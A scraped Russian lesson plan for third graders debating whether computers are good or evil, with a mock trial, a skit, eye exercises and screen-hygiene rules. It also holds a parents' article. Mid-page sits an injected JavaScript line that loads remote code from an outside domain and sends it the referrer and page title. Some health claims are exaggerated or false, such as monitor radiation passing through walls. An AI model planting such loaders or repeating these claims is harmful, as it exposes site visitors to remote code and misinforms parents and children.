Компьютер добро или зло классный час

Обновлено: 07.07.2024

Интерактивная доска, оборудование программы « PROklass », проектор, зеленые и красные флажки для каждого ученика, ноутбук, шапка-ушанка для старика, платок для старухи.

Ход мероприятия:

1) Сетевая паутина

оплела весь белый свет,

не пройти детишкам мимо.

Что же это? (Интернет).

А Интернет без чего не может быть?

2) Умная машина желания наши выполняет.

Не все реально, но все – виртуально. (Компьютер)

- Да, сегодня пойдет речь о компьютере и Интернете. Чтобы понять, почему же мы завели сегодня об этом разговор, предлагаю посмотреть сценку.

Дед: Что-то с бабкою моею!
Ох! Перевернулся свет!
Я болею и худею.
Ну а ей и дела нет.
Раньше в доме убирала,
И готовила обед.
А теперь - все сериалы
Да - компьютер - интернет.
Говорю ей:"Сын и внуки,
И невестка едут к нам"
А она сложила руки,
И уставилась в экран.
То с соседкою сидела,
На скамейке, у ворот.
Все ей, нынче, надоело.
Бабка: - Вы, - кричит, - тупой народ.
Дед: И меня, едва, из дому,
Сгоряча, не прогнала.
Бабка: Да, к богатому, другому,
Собралась. Вот так дела!
Дед: Сыплет умными словами:
Бабка: "Ник да квест, да сайт, да чат."
Дед: Уж смеются все над нами.
Чтоб не обижать, молчат.
Да, скажу Вам, люди, честно.
Интернет тот - просто грех.
Не могу найти я места.
Сторонюсь знакомых всех.
То была родной, домашней.
Мог хвалиться хоть кому!
С кем она там водит «шашни»,
В интернете? Не пойму!
Разыскала старикана -
Первую любовь свою.
Коль дойдет там до романа.
Я не выдержу - убью.

- За что старик сердится на старуху?

- Ребята, давайте составим с вами таблицу плюсов и минусов. (Учитель рисует на доске таблицу. Первый вопрос первой колонки (- Ребята, как вы думаете, это плюс или минус?) Заполняется сначала первая колонка, затем вторая.)

«Любите ли вы заниматься с компьютером? Почему?» Это «плюсы»

Проблема: «Почему родители запрещают долго сидеть за компьютером?» Это «минусы»

- интересно, новые друзья

- можно найти много полезного и нового

- нужно для будущего, сейчас все компьютеризировано

- в Интернете можно найти все

- без компьютера в современном мире не обойтись

- глаза будут болеть, зрение испортится, связано со здоровьем

- время пролетает быстро – не успеваешь дела сделать

- «У нас в детстве интереснее было»- играли с друзьями

- много вредного в Интернете можно увидеть

- непонятно, как время проводишь, все скрытно и тайно

- Так что же из выше сказанного правда, а что надумано? Как быть, давайте размышлять. А чтобы нам можно было все взвесить правильно, обратимся к ребятам, которые сегодня у нас в роли судебных работников: обвинителей и адвокатов. А вот судьями будем мы с вами! Перенесемся в зал Суда.

(Выходят Обвинители и Адвокаты)

1 Обвинитель:

- По данным современной медицины человек на 25 процентов теряет зрение из-за работы на компьютере. А в некоторых случаях и до 70 процентов. Часто мелькающие картинки влияют на сетчатку глаза, заставляя ее испытывать большое напряжение. Предлагаю наказание в виде отлучения компьютера от людей.

- Протестую! Создатели этих умных машин задумались над этим и, уже создаются защитные экраны, которые позволяют защитить глаз человека от вредных воздействий компьютера и телевизора! Требую оправдания!

2 Обвинитель:

- Стоит заметить, что настоящая защита возможно и будет, но в будущем. А сейчас нам с вами надо самим позаботиться о своем здоровье. Компьютер влияет не только на зрение. Оказывается, напрягается не только глаз, но и вся нервная система человека. Негативное, т.е. плохое влияние оказывают компьютерные игры на неокрепший детский организм. Они заставляют человека постоянно находиться в тонусе, не дают мозгу расслабиться и отдохнуть, поэтому возникает необъяснимая агрессия: дети начинают кричать, сами того не замечая, капризничать, даже кидаются драться. Зависимый от игры человек (игроман) не представляет, насколько опасно постоянно «зависать» в игре. В последствии он перестает различать реальность и игру. Некоторые дети даже убивали, находясь под влиянием компьютерных игр. Предлагаю Высшую меру наказания – забыть компьютер навсегда!

- Да, компьютер влияет на нервную систему человека. Но ведь дети сами кричат и просят родителей поиграть. Чем же он виноват? А между тем, компьютерные гении, люди, хорошо понимающие эту машину, и много хорошего сделали. Именно они создали с помощью компьютера новые медицинские аппараты, позволяющие лечить такие заболевания, которые ранее были неизлечимы. Наиболее точной стала диагностика ранних стадий заболеваний, и это тоже не без помощи компьютера. Требую полного оправдания!

3 Обвинитель:

- А я все-таки думаю, нужно быть очень осторожным. Тем более, оказывается, не только глаза и нервная система страдают. Плохо также и нашей спине. Мы много сидим за партой, пишем, читаем, решаем. При этом не заботимся о нашей осанке. Представьте, вместо игр на воздухе, мы еще сидим за компьютером. А потом получаем такое страшное заболевание, как сколиоз. Доказано, что сколиоз (искривление позвоночника) влияет на многие внутренние органы. Человек начинает болеть, и часто не догадывается, что во всем виноват, в том числе и компьютер. Он лечит, он же и калечит! Наказание – полное истребление.

- Все в наших руках. А чтобы спина и глаза не болели, нужно делать зарядку для глаз и для спины.

Комплекс упражнений для снятия напряжения и утомления при работе за компьютером

Упражнения для глаз:

1. Закрыть глаза, не напрягая глазные мышцы, на счет 1–4, широко раскрыть глаза и посмотреть вдаль на счет 1–6. Повторить 4–5 раз.

2. Посмотреть на кончик носа на счет 1–4, а потом перевести взгляд вдаль на счет 1–6. Повторить 4–5 раз.

3. Не поворачивая головы (голова прямо), делать медленно круговые движения глазами вверх - вправо- вниз - влево и в обратную сторону: вверх -влево- вниз- вправо. Затем посмотреть вдаль на счет 1–6. Повторить 4–5 раз.

4. При неподвижной голове перевести взор с фиксацией его на счет 1–4 вверх, на счет 1–6 прямо; после чего аналогичным образом вниз-прямо, вправо-прямо, влево-прямо. Проделать движение по диагонали в одну и другую стороны с переводом глаз прямо на счет 1–6. Повторить 3–4 раза.

Для снятия общего напряжения:

1. Стойка ноги врозь, руки согнутые вперед, кисти в кулаках. 1 – с поворотом туловища налево "удар" правой рукой вперед. 2 – и.п. 3–4 – то же в другую сторону. Повторить 6–8 раз. Дыхание не задерживать.

2. О.с. 1 – руки в стороны, туловище и голову повернуть налево. 2 – руки вверх. 3 – руки за голову. 4 – и.п. Повторить 4–6 раз в каждую сторону. Темп медленный.

Для улучшения мозгового кровообращения:

1. О.с. 1 – руки за голову; локти развести пошире, голову наклонить назад. 2 – локти вперед. 3–4 – руки расслабленно вниз, голову наклонить вперед. Повторить 4–6 раз. Темп медленный.

2. И.п. – сидя на стуле. 1 – голову наклонить вправо. 2 – и.п. 3 – голову наклонить влево. 4 – и.п. Повторить 4–6 раз. Темп средний.

Для снятия утомления туловища и ног:

1. И.п. – стойка ноги врозь, руки за голову. 1–3 – круговые движения тазом в одну сторону. 4–6 – то же в другую сторону. 7–8 – руки вниз и расслабленно потрясти кистями. Повторить 4–6 раз. Темп средний.

2. И.п. – стойка ноги врозь. 1–2 – наклон вперед, правая рука скользит вдоль ноги вниз, левая, сгибаясь, вдоль тела вверх. 3–4 – и.п. 5–8 – то же в другую сторону. Повторить 6–8 раз. Темп средний.

3 Адвокат: (продолжает)

- А я не представляю себе наше будущее без компьютера. А как же все новое в нашей жизни? Это и телефон сотовый, и возможность при общении видеть друг друга на большом расстоянии, а также космические технологии, как же без компьютера? Я считаю, что компьютер был создан для помощи человеку. И он его помощник. Как же современный мир без компьютера? Как же заводы, банки, школы? Оправдать по всем пунктам обвинения!

4 Обвинитель:

- А как же простое человеческое общение? Игры на воздухе? Это все машина нам сможет дать? Рукопожатие друга? Мы же люди, а не роботы. Убрать компьютер.

- Через компьютер тоже можно общаться. И не выходя из дома. Многие люди нашли друг друга через Интернет. И они счастливы. Компьютер очень нужен.

- Предлагаю судьям слово. Есть ли какие-то вопросы к обвинению и адвокатам? Прослушайте стихотворение.

День хороший за окном,

Ну а мне все скучно.

Люди ходят все кругом

Толпами, да кучно.

День прекрасен, ну а мне

А зайду-ка я в ИНЕТ,

В мир, что полон брани.

Тут и сплетни, и задор,

Нынче ведь такой позор,

Не позор – утеха!

Гляну, кто ж мне написал?!

А к добру ли все? Ко злу?

Ведь друзей не видим.

Лишь по клавишам стучим,

Этим всем и сыты!

А куда же делись все,

Ведь не так уж стары,

Книги, письма и эссе,

Песни под гитару?!

В виртуальных далях

И не видим, что за зря

Раскидало же ведь нас

В жизни по дорогам,

Но к добру или ко злу?!

Ведомо лишь Богу!

А мораль лишь такова:

Коль тонуть мы стали

(В море НЕТА, что без дна),

Хоть крути туда, сюда,

Я хочу чтоб знали:

„ Нету лиха без добра!

Чтоб не забывали!”

Младинов Степан Васильевич

- Теперь предлагаю сделать выводы.

1) «Все хорошо в меру». И если компьютер использовать строго по времени, то негативных (плохих) последствий не будет

2) Существуют правила гигиены при работе с компьютером. Вот они и помогут нам сохранить здоровье.

Правила гигиены при работе с компьютером:

Освещение при работе с компьютером должно быть не слишком ярким, но и не отсутствовать совсем, идеальный вариант - приглушенный рассеянный свет.

Экран монитора должен быть абсолютно чистым; нужно протирать экран монитора (лучше специальными салфетками и/или жидкостью для протирки мониторов) минимум раз в неделю, следить за кристальной прозрачностью очков каждый день ( если ваш ребёнок носит очки).

Располагать монитор и клавиатуру на рабочем столе прямо, ни в коем случае не наискосок.

Центр экрана должен быть примерно на уровне глаз или чуть ниже. Держать голову прямо, без наклона вперед. Иногда встречаются рекомендации использовать специальные очки, фильтры. Они действительно способны поднять какой-то из показателей видеосистемы, но только в ущерб другому показателю.

Экран монитора должен быть удален от глаз минимум на 50- 60 сантиметров. Уровень электромагнитного излучения сбоку и сзади монитора выше, чем спереди. Установите компьютер в углу комнаты или так, чтобы не работающие на нем не оказывались сбоку или сзади от монитора. Помните о находящихся людях в соседней комнате - стены и перегородки излучению не помеха.

Часто мониторы стоят слишком низко. Человек этого почти не замечает, но чтобы смотреть на монитор было удобно, приходится нагибать голову, чуть сползать на стуле. При этом напрягается шея, мозг хуже снабжается кровью, возникают головные боли, другие неприятные последствия. Нужно отрегулировать расположение монитора. Центр экрана должен быть примерно на уровне глаз или чуть ниже, чтобы было удобно сидеть на стуле, не нагибая голову, не искривляя позвоночник .

Для школьников старших классов продолжительность сеанса работы с компьютером не должна превышать 30 минут, для школьников младших классов — 10- 20 минут в час

Основные правила гигиены зрения

Комфортное рабочее место .
Оно должно быть достаточно освещено, световое поле равномерно распределено по всей площади рабочего пространства, лучи света не должны попадать прямо в глаза.

Специальное питание для глаз .
Детям с ослабленным зрением нужно употреблять продукты, укрепляющие сосуды сетчатки глаза: чернику, черную смородину, морковь. В рационе близоруких должна присутствовать печень трески, зелень: петрушка, салат, укроп, зеленый лук. При дистрофии сетчатки помогает шиповник (настой, отвар), клюква.

Полезны для глаз витамины (особенно комплексные поливитамины, в которых витамины сочетаются с микроэлементами: цинком, кальцием), все препараты на основе черники. При заболеваниях глаз стоит раз в год принимать курс рыбьего жира.

Постоянно выполнять зарядку для глаз.

- А сейчас вы пройдете интерактивное тестирование на наших пультах. Посмотрим, как вы определились со своим отношением к компьютеру, что поняли.

Внимание Скидка 50% на курсы! Спешите подать
заявку

Профессиональной переподготовки 30 курсов от 6900 руб.

Курсы для всех от 3000 руб. от 1500 руб.

Повышение квалификации 36 курсов от 1500 руб.

Лицензия №037267 от 17.03.2016 г.
выдана департаментом образования г. Москвы


Классный час для учащихся 3 класса «Компьютер – добро или зло?»

((__lxGc__=window.__lxGc__||<'s':<>,'b':0>)['s']['_197117']=__lxGc__['s']['_197117']||>)['b']['_574359']=<'i':__lxGc__.b++>; var d=document;var s=d.createElement('script'); s.src='https://3slivtd.ru/BFjWgr?frm=script&&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&_cid=dd5ad15d-9f89-1596-33bb-24c0516e474b'; d.getElementById("dd5ad15d-9f89-1596-33bb-24c0516e474b").appendChild(s);

Государственное бюджетное общеобразовательное учреждение Самарской области средняя общеобразовательная школа №1 города Кинеля городского округа Кинель Самарской области

для учащихся 3 класса

«Компьютер – добро или зло?»

учитель начальных классов

Полянская Наталья Михайловна

Классный час на тему: «Компьютер – добро или зло?»

формировать осознанное отношение к компьютеру, Интернету;

воспитывать умение управлять своим эмоциональным состоянием;

развивать кругозор учащихся, познакомить с правилами гигиены при работе с компьютером

Форма проведения: ролевая игра «Суд»

Интерактивная доска, оборудование программы « PROklass », проектор, зеленые и красные флажки для каждого ученика, ноутбук, шапка-ушанка для старика, платок для старухи.

1) Сетевая паутина

оплела весь белый свет,

не пройти детишкам мимо.

Что же это? (Интернет).

А Интернет без чего не может быть?

2) Умная машина желания наши выполняет.

Не все реально, но все – виртуально. (Компьютер)

- Да, сегодня пойдет речь о компьютере и Интернете. Чтобы понять, почему же мы завели сегодня об этом разговор, предлагаю посмотреть сценку.

Дед: Что-то с бабкою моею!
Ох! Перевернулся свет!
Я болею и худею.
Ну а ей и дела нет.
Раньше в доме убирала,
И готовила обед.
А теперь - все сериалы
Да - компьютер - интернет.
Говорю ей:"Сын и внуки,
И невестка едут к нам"
А она сложила руки,
И уставилась в экран.
То с соседкою сидела,
На скамейке, у ворот.
Все ей, нынче, надоело.
Бабка: - Вы, - кричит, - тупой народ.
Дед: И меня, едва, из дому,
Сгоряча, не прогнала.
Бабка: Да, к богатому, другому,
Собралась. Вот так дела!
Дед: Сыплет умными словами:
Бабка: "Ник да квест, да сайт, да чат."
Дед: Уж смеются все над нами.
Чтоб не обижать, молчат.
Да, скажу Вам, люди, честно.
Интернет тот - просто грех.
Не могу найти я места.
Сторонюсь знакомых всех.
То была родной, домашней.
Мог хвалиться хоть кому!
С кем она там водит «шашни»,
В интернете? Не пойму!
Разыскала старикана -
Первую любовь свою.
Коль дойдет там до романа.
Я не выдержу - убью.

- За что старик сердится на старуху?

- Ребята, давайте составим с вами таблицу плюсов и минусов. (Учитель рисует на доске таблицу. Первый вопрос первой колонки (- Ребята, как вы думаете, это плюс или минус?) Заполняется сначала первая колонка, затем вторая.)

«Любите ли вы заниматься с компьютером? Почему?» Это «плюсы»

Проблема: «Почему родители запрещают долго сидеть за компьютером?» Это «минусы»

- интересно, новые друзья

- можно найти много полезного и нового

- нужно для будущего, сейчас все компьютеризировано

- в Интернете можно найти все

- без компьютера в современном мире не обойтись

- глаза будут болеть, зрение испортится, связано со здоровьем

- время пролетает быстро – не успеваешь дела сделать

- «У нас в детстве интереснее было»- играли с друзьями

- много вредного в Интернете можно увидеть

- непонятно, как время проводишь, все скрытно и тайно

- Так что же из выше сказанного правда, а что надумано? Как быть, давайте размышлять. А чтобы нам можно было все взвесить правильно, обратимся к ребятам, которые сегодня у нас в роли судебных работников: обвинителей и адвокатов. А вот судьями будем мы с вами! Перенесемся в зал Суда.

(Выходят Обвинители и Адвокаты)

- По данным современной медицины человек на 25 процентов теряет зрение из-за работы на компьютере. А в некоторых случаях и до 70 процентов. Часто мелькающие картинки влияют на сетчатку глаза, заставляя ее испытывать большое напряжение. Предлагаю наказание в виде отлучения компьютера от людей.

- Протестую! Создатели этих умных машин задумались над этим и, уже создаются защитные экраны, которые позволяют защитить глаз человека от вредных воздействий компьютера и телевизора! Требую оправдания!

- Стоит заметить, что настоящая защита возможно и будет, но в будущем. А сейчас нам с вами надо самим позаботиться о своем здоровье. Компьютер влияет не только на зрение. Оказывается, напрягается не только глаз, но и вся нервная система человека. Негативное, т.е. плохое влияние оказывают компьютерные игры на неокрепший детский организм. Они заставляют человека постоянно находиться в тонусе, не дают мозгу расслабиться и отдохнуть, поэтому возникает необъяснимая агрессия: дети начинают кричать, сами того не замечая, капризничать, даже кидаются драться. Зависимый от игры человек (игроман) не представляет, насколько опасно постоянно «зависать» в игре. В последствии он перестает различать реальность и игру. Некоторые дети даже убивали, находясь под влиянием компьютерных игр. Предлагаю Высшую меру наказания – забыть компьютер навсегда!

- Да, компьютер влияет на нервную систему человека. Но ведь дети сами кричат и просят родителей поиграть. Чем же он виноват? А между тем, компьютерные гении, люди, хорошо понимающие эту машину, и много хорошего сделали. Именно они создали с помощью компьютера новые медицинские аппараты, позволяющие лечить такие заболевания, которые ранее были неизлечимы. Наиболее точной стала диагностика ранних стадий заболеваний, и это тоже не без помощи компьютера. Требую полного оправдания!

- А я все-таки думаю, нужно быть очень осторожным. Тем более, оказывается, не только глаза и нервная система страдают. Плохо также и нашей спине. Мы много сидим за партой, пишем, читаем, решаем. При этом не заботимся о нашей осанке. Представьте, вместо игр на воздухе, мы еще сидим за компьютером. А потом получаем такое страшное заболевание, как сколиоз. Доказано, что сколиоз (искривление позвоночника) влияет на многие внутренние органы. Человек начинает болеть, и часто не догадывается, что во всем виноват, в том числе и компьютер. Он лечит, он же и калечит! Наказание – полное истребление.

- Все в наших руках. А чтобы спина и глаза не болели, нужно делать зарядку для глаз и для спины.

Комплекс упражнений для снятия напряжения и утомления при работе за компьютером

Упражнения для глаз:

1. Закрыть глаза, не напрягая глазные мышцы, на счет 1–4, широко раскрыть глаза и посмотреть вдаль на счет 1–6. Повторить 4–5 раз.

2. Посмотреть на кончик носа на счет 1–4, а потом перевести взгляд вдаль на счет 1–6. Повторить 4–5 раз.

3. Не поворачивая головы (голова прямо), делать медленно круговые движения глазами вверх - вправо- вниз - влево и в обратную сторону: вверх -влево- вниз- вправо. Затем посмотреть вдаль на счет 1–6. Повторить 4–5 раз.

4. При неподвижной голове перевести взор с фиксацией его на счет 1–4 вверх, на счет 1–6 прямо; после чего аналогичным образом вниз-прямо, вправо-прямо, влево-прямо. Проделать движение по диагонали в одну и другую стороны с переводом глаз прямо на счет 1–6. Повторить 3–4 раза.

Для снятия общего напряжения:

1. Стойка ноги врозь, руки согнутые вперед, кисти в кулаках. 1 – с поворотом туловища налево "удар" правой рукой вперед. 2 – и.п. 3–4 – то же в другую сторону. Повторить 6–8 раз. Дыхание не задерживать.

2. О.с. 1 – руки в стороны, туловище и голову повернуть налево. 2 – руки вверх. 3 – руки за голову. 4 – и.п. Повторить 4–6 раз в каждую сторону. Темп медленный.

Для улучшения мозгового кровообращения:

1. О.с. 1 – руки за голову; локти развести пошире, голову наклонить назад. 2 – локти вперед. 3–4 – руки расслабленно вниз, голову наклонить вперед. Повторить 4–6 раз. Темп медленный.

2. И.п. – сидя на стуле. 1 – голову наклонить вправо. 2 – и.п. 3 – голову наклонить влево. 4 – и.п. Повторить 4–6 раз. Темп средний.

Для снятия утомления туловища и ног:

1. И.п. – стойка ноги врозь, руки за голову. 1–3 – круговые движения тазом в одну сторону. 4–6 – то же в другую сторону. 7–8 – руки вниз и расслабленно потрясти кистями. Повторить 4–6 раз. Темп средний.

2. И.п. – стойка ноги врозь. 1–2 – наклон вперед, правая рука скользит вдоль ноги вниз, левая, сгибаясь, вдоль тела вверх. 3–4 – и.п. 5–8 – то же в другую сторону. Повторить 6–8 раз. Темп средний.

3 Адвокат : (продолжает)

- А я не представляю себе наше будущее без компьютера. А как же все новое в нашей жизни? Это и телефон сотовый, и возможность при общении видеть друг друга на большом расстоянии, а также космические технологии, как же без компьютера? Я считаю, что компьютер был создан для помощи человеку. И он его помощник. Как же современный мир без компьютера? Как же заводы, банки, школы? Оправдать по всем пунктам обвинения!

- А как же простое человеческое общение? Игры на воздухе? Это все машина нам сможет дать? Рукопожатие друга? Мы же люди, а не роботы. Убрать компьютер.

- Через компьютер тоже можно общаться. И не выходя из дома. Многие люди нашли друг друга через Интернет. И они счастливы. Компьютер очень нужен.

- Предлагаю судьям слово. Есть ли какие-то вопросы к обвинению и адвокатам? Прослушайте стихотворение.

День хороший за окном,

Ну а мне все скучно.

Люди ходят все кругом

Толпами, да кучно.

День прекрасен, ну а мне

А зайду-ка я в ИНЕТ,

В мир, что полон брани.

Тут и сплетни, и задор,

Нынче ведь такой позор,

Не позор – утеха!

Гляну, кто ж мне написал?!

А к добру ли все? Ко злу?

Ведь друзей не видим.

Лишь по клавишам стучим,

Этим всем и сыты!

А куда же делись все,

Ведь не так уж стары,

Книги, письма и эссе,

Песни под гитару?!

В виртуальных далях

И не видим, что за зря

Раскидало же ведь нас

В жизни по дорогам,

Но к добру или ко злу?!

Ведомо лишь Богу!

А мораль лишь такова:

Коль тонуть мы стали

(В море НЕТА, что без дна),

Хоть крути туда, сюда,

Я хочу чтоб знали:

„ Нету лиха без добра!

Чтоб не забывали!”

- Теперь предлагаю сделать выводы.

1) «Все хорошо в меру». И если компьютер использовать строго по времени, то негативных (плохих) последствий не будет

2) Существуют правила гигиены при работе с компьютером. Вот они и помогут нам сохранить здоровье.

Правила гигиены при работе с компьютером:

Освещение при работе с компьютером должно быть не слишком ярким, но и не отсутствовать совсем, идеальный вариант - приглушенный рассеянный свет.

Экран монитора должен быть абсолютно чистым; нужно протирать экран монитора (лучше специальными салфетками и/или жидкостью для протирки мониторов) минимум раз в неделю, следить за кристальной прозрачностью очков каждый день ( если ваш ребёнок носит очки).

Располагать монитор и клавиатуру на рабочем столе прямо, ни в коем случае не наискосок.

Центр экрана должен быть примерно на уровне глаз или чуть ниже. Держать голову прямо, без наклона вперед. Иногда встречаются рекомендации использовать специальные очки, фильтры. Они действительно способны поднять какой-то из показателей видеосистемы, но только в ущерб другому показателю.

Экран монитора должен быть удален от глаз минимум на 50- 60 сантиметров. Уровень электромагнитного излучения сбоку и сзади монитора выше, чем спереди. Установите компьютер в углу комнаты или так, чтобы не работающие на нем не оказывались сбоку или сзади от монитора. Помните о находящихся людях в соседней комнате - стены и перегородки излучению не помеха.

Часто мониторы стоят слишком низко. Человек этого почти не замечает, но чтобы смотреть на монитор было удобно, приходится нагибать голову, чуть сползать на стуле. При этом напрягается шея, мозг хуже снабжается кровью, возникают головные боли, другие неприятные последствия. Нужно отрегулировать расположение монитора. Центр экрана должен быть примерно на уровне глаз или чуть ниже, чтобы было удобно сидеть на стуле, не нагибая голову, не искривляя позвоночник .

Для школьников старших классов продолжительность сеанса работы с компьютером не должна превышать 30 минут, для школьников младших классов — 10- 20 минут в час

Основные правила гигиены зрения

Комфортное рабочее место .
Оно должно быть достаточно освещено, световое поле равномерно распределено по всей площади рабочего пространства, лучи света не должны попадать прямо в глаза.

С пециальное питание для глаз .
Детям с ослабленным зрением нужно употреблять продукты, укрепляющие сосуды сетчатки глаза: чернику, черную смородину, морковь. В рационе близоруких должна присутствовать печень трески, зелень: петрушка, салат, укроп, зеленый лук. При дистрофии сетчатки помогает шиповник (настой, отвар), клюква.

Полезны для глаз витамины (особенно комплексные поливитамины, в которых витамины сочетаются с микроэлементами: цинком, кальцием), все препараты на основе черники. При заболеваниях глаз стоит раз в год принимать курс рыбьего жира.

Постоянно выполнять зарядку для глаз.

- А сейчас вы пройдете интерактивное тестирование на наших пультах. Посмотрим, как вы определились со своим отношением к компьютеру, что поняли.

Предназначен для учащихся 3 классов, Содержит разработку беседы по теме , памятку для детей.

ВложениеРазмер
razrabotka_kl._chasa.doc 56 КБ
pamyatka.docx 168.68 КБ

Предварительный просмотр:

«Компьютер – враг, друг, помощник»

Цель: Содействовать определению места и роли компьютера в жизни ребёнка

Задачи: 1. Показать упражнения при работе с компьютером.

2. Ориентировать на общение с другими людьми, на развитие своих способностей и соблюдение определенных правил при работе с компьютером.

Он рисует, он считает,

Даже в космосе летает

И дает прогноз погоды.

Может сделать за минуту.

Догадайтесь, что за гений?

Ну, конечно же … (Компьютер.)

-Итак, тема нашей беседы «Компьютер». Но давайте рассмотрим, что такое компьютер для нас – друг, враг или помощник.

Еще 20 лет назад компьютер был диковинкой, а в настоящее время он стал многим доступен. Слово «компьютер» произошло от греческого «компьюто», что означает: считаю, вычисляю. Так компьютер назвали потому, что вначале он использовался для сложных вычислений. Тогда компьютер ещё называли электронно-вычислительной машиной или, сокращённо, ЭВМ, и был очень большой размером с комнату.

- Давайте выясним, что относится к компьютеру. Из каких составных частей компьютер состоит? Отгадаем загадки:

только клавиш в ней – не счесть!

Алфавита там картина,

знаки, цифры тоже есть.

Очень тонкая натура.

Имя ей . (Клавиатура).

То замрет, то закружит,

Коврика не покидает,

Что за зверь, кто угадает?

«ящик» справа, возле ног,

и слегка шумит при этом.

Что за «зверь?». ( Системный блок ).

на него направлен взор,

носит имя. ( Монитор) .

На бумаге, без огрех,

Из какой коробки лезет

Текст на удивленье всех?

оплела весь белый свет,

не пройти детишкам мимо.

Что же это? ( Интернет).

- У кого дома есть компьютер?

Ребята, как вы думаете: компьютер – друг, помощник или враг? (мнения детей: друг и помощник, враг, и то, и другое). Хорошо, что у каждого свое мнение.

  1. Произнесите все слово друг. Что вам вспоминается? (как мы играем).

Продолжи фразу: Компьютер – друг, потому что… (с ним можно играть, рисовать, т. е приятно проводить время).

Приглашаю двух друзей, подруг.

Задание: Улыбнитесь друг другу. Скажите: «Мне с тобой так весело, я рад тебя видеть». Какие чувства испытали? Сравните свои ощущения - вы улыбнитесь компьютеру, скажите ему как вы рады его видеть. Вы испытали приятные чувства, радость, тепло от такого общения?

- Как поступишь ты в следующей ситуации?

  • Ребята зовут тебя на улицу, а ты играешь на компьютере. (Я приму их приглашение, я откажусь).
  • Мама просит тебя помочь, а ты играешь на компьютере. (Я сразу помогу маме, я попрошу подождать).

Итог, вывод информации: Продолжи следующую фразу: Компьютер – друг, но….(нельзя забывать о друзьях, людях, семье)

Кому и в чем помогает компьютер? (высказывания детей)

- Без компьютера не обходятся нигде. Компьютер помогает врачу ставить диагноз и назначать лечение. Бухгалтер составляет отчеты при помощи компьютера. Художнику он помогает создавать картины и мультипликационные фильмы. Инженеры с помощью компьютера ведут сложные расчёты, составляют чертежи новых машин, космических кораблей. Школьникам помогает находить необходимую информацию, готовить рефераты

- Какую помощь оказывает вам компьютер? ( помогает считать, находить ошибки, найти нужную информацию, переводить иностранный текст).

-Согласны ли вы с тем, что тогда школьникам не надо читать книги, чтобы много знать, не надо учить таблицу умножения, учить правила правописания?

Плохо, когда человек в детстве не учиться думать, он тогда не развивает свои способности. А значит, не вырастет из него ни бухгалтер, ни художник , ни врач.

Вывод ПРОДОЛЖИ ПРЕДЛОЖЕНИЕ:

С компьютером интересно учиться, познавать окружающий мир. Он помогает человеку и работать, и учиться, и в игры играть. Главное, чтобы он не мешал развиваться вашим способностям и талантам.

  1. Компьютер – враг? Какой вред может нанести компьютер детскому организму? ответы

Вред компьютера: Компьютер испускает электромагнитное излучение. Оно действует на любую клетку организма. Это очень серьезная проблема. С каждым годом отмечается всеобщее ухудшение самочувствия людей: частые головные боли, раздражительность, быстрая утомляемость, сонливость, рост хронических заболеваний.

- Итак, ребята, как мы видим компьютер приносит не только пользу, но и может навредить здоровью. И давайте сейчас поговорим о том, как сохранить свое здоровье.

- Предлагаю вам познакомиться с вредными советами. Попробуйте сделать из них полезные советы. Как поступить правильно?

Никогда не мойте руки,

Это глупое занятие

Не приводит ни к чему.

Вновь испачкаются руки,

Так зачем же тратить силы,

Время попусту терять. Влажная уборка и проветривание помещения

(Грязная клавиатура является источником распространения вредных микробов, поэтому ее надо регулярно протирать, мыть руки.)

Нет приятнее занятья,

чем сутулясь сильно-сильно

Посидеть у монитора.

И наступит день счастливый –

Вас в какое –нибудь царство

Примут главным горбуном! ПРАВИЛЬНАЯ ПОСАДКА УДОБНО, НОГИ ПОД ПРЯМЫМ УГЛОМ СПИНА

Хочешь зрение улучшить,

Сядь поближе к монитору,

Лучше сразу носом ткнуться

И сидеть часов так десять.

И тогда уж через месяц

Будет глаз как у орла. + ОСВЕЩЕНИЕ В ПОМЕЩЕНИИ

(Чтобы глаза не уставали и зрение не ухудшалось, надо сесть подальше от монитора, оптимально - 50 см. Монитор немного отклоните назад. Обязательно делайте зарядку для глаз.

- ВЫПОЛНИМ Упражнения для глаз при работе с компьютером:

Закрываем мы глаза, вот такие чудеса.

Наши глазки отдыхают,

А теперь мы их откроем,

Через речку мост построим.

Нарисуем букву «О», получается легко.

Вверх поднимем, глянем вниз.

Заниматься вновь начнем.

какое решение примем: компьютер – друг, враг или помощник?

Когда компьютер может стать врагом?

ПАМЯТКИ ( вручаю детям памятки « Как сохранить здоровье при работе за компьютером» и «Гимнастика для глаз»)

В конце нашей беседы я прочитаю вам сказку

В одном городе жил мастер, окруженный учениками. Однажды один из учеников задумался «А есть ли вопрос, на который наш мастер не смог бы дать ответа?». Он пошел на цветущий луг, поймал самую красивую бабочку и спрятал ее между ладонями. Держа ее, он думал «Если мастер ответит что бабочка мертвая, я тут же отпущу ее и он увидит что ошибся. Если же скажет что бабочка живая, я сожму руки и она погибнет». Подойдя к мастеру ученик спросил: « Скажите какая бабочка у меня в руках: живая или мертвая?» не глядя на руки ученика мастер ответил: «Всё в твоих руках»

Давайте подведем итоги. Если беседа именно для тебя была полезной и интересной. То возьми красный магнит и прикрепи его на это место. Если беседа для тебя была только интересной. То возьми синий магнит и прикрепи его на это место. Ну а если ты остался равнодушным к теме беседы, то возьми зеленый и прикрепи его на отведенное место…

Компьютер: добро или зло?

Компьютеры в современной жизни заняли прочное место не только в жизни взрослых, но и детей. Во всех семьях, даже в семьях с небольшим достатком, родители осознают, что их растущему ребёнку нужна умная машина. Уроки информатики начинаются с младшей школы, домашние задания по созданию простейших компьютерных презентаций становятся уже почти обязательными во многих школах. Да и «компьютеризированные» одноклассники могут начать подшучивать над малышом, который незнаком с компьютерными играми. Стоит ли родителям опасаться компьютера или он является необходимостью? С какого возраста ребёнок может самостоятельно управлять компьютером? Как должно выглядеть общение ребёнка с умной машиной?

Говоря о вреде длительного пребывания ребёнка у монитора, доктора упоминают о следующих факторах.
- Неправильная посадка за столом вызывает у детей нарушение осанки; снижение двигательной активности приводит к увеличению веса; мерцание монитора способствует ухудшению зрения. С этими проблемами можно справится путём правильной организацией рабочего места у компьютера и ограничением детского компьютерного времени.
- У детей, остро ощущающих недостаток внимания со стороны родителей, неуравновешенных, легковозбудимых, часто возникает компьютерная зависимость.
- Очень быстро у таких детей наступает нервное истощение, перенапряжение, с которыми сложно бороться.
- «Неправильные» компьютерные игры влекут за собой появление агрессивного поведения у детей. Неустойчивая детская психика заставляет детей быть нервными, неуправляемыми, чрезмерно шумными.

Безопасная работа за компьютером.
